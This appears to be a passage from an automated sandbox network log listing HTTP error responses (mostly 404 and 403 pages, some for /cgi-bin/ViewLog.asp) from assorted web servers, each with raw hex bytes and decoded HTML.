    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cachePragma: no-cacheDate: Wed, 14 Feb 2024 11:32:59 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:33:01 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:33:06 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 193Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:33:08 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Wed, 14 Feb 2024 08:33:10 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:33:10 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:33:12 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:33:11 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Wed, 14 Feb 2024 08:33:13 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 35 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 16:33:14 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:38:27 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:33:18 GMTConnection: CloseCache-Control: no-storeX-Content-Type-Options: nosniffX-Frame-Options: DENYStrict-Transport-Security: max-age=4250666; includeSubDomainsContent-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.airtel.cy *.ookla.com *.speedtest.net *.airtel.com.cy *.speedtestcustom.com; upgrade-insecure-requests
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.2Date: Wed, 14 Feb 2024 08:33:24 GMTContent-Type: text/htmlConnection: closeContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 40 84 ac 44 1f 66 a8 3e d4 41 00 30 a0 c1 30 99 00 00 00 Data Ascii: (HML),I310Q/Qp/K&T$dCAfAyyyzF@Df>A00
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 132X-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 20 4f 62 73 65 72 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 77 68 69 74 65 3e 0a 3c 48 31 3e 45 72 72 6f 72 20 4f 62 73 65 72 76 65 64 3c 2f 48 31 3e 0a 3c 50 3e 45 72 72 6f 72 3a 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>Error Observed</TITLE></HEAD><BODY BGCOLOR=white><H1>Error Observed</H1><P>Error: 404 Not Found</BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:33:28 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Wed, 14 Feb 2024 08:33:25 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Wed, 14 Feb 2024 08:33:32 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:33:34 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:33:38 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: PsiOcppAppConnection: keep-aliveDate:Wed, 14 Feb 2024 8:33:38 GMTContent-Length: 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:33:18 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Jan 1970 01:50:16 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: imgproxyX-Request-Id: EkVx5jSkRsuOYUpXUf6CFDate: Wed, 14 Feb 2024 08:33:55 GMTContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 19:25:12 GMTServer: ApacheX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge;IE=11;IE=10;IE=9Content-Length: 348Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
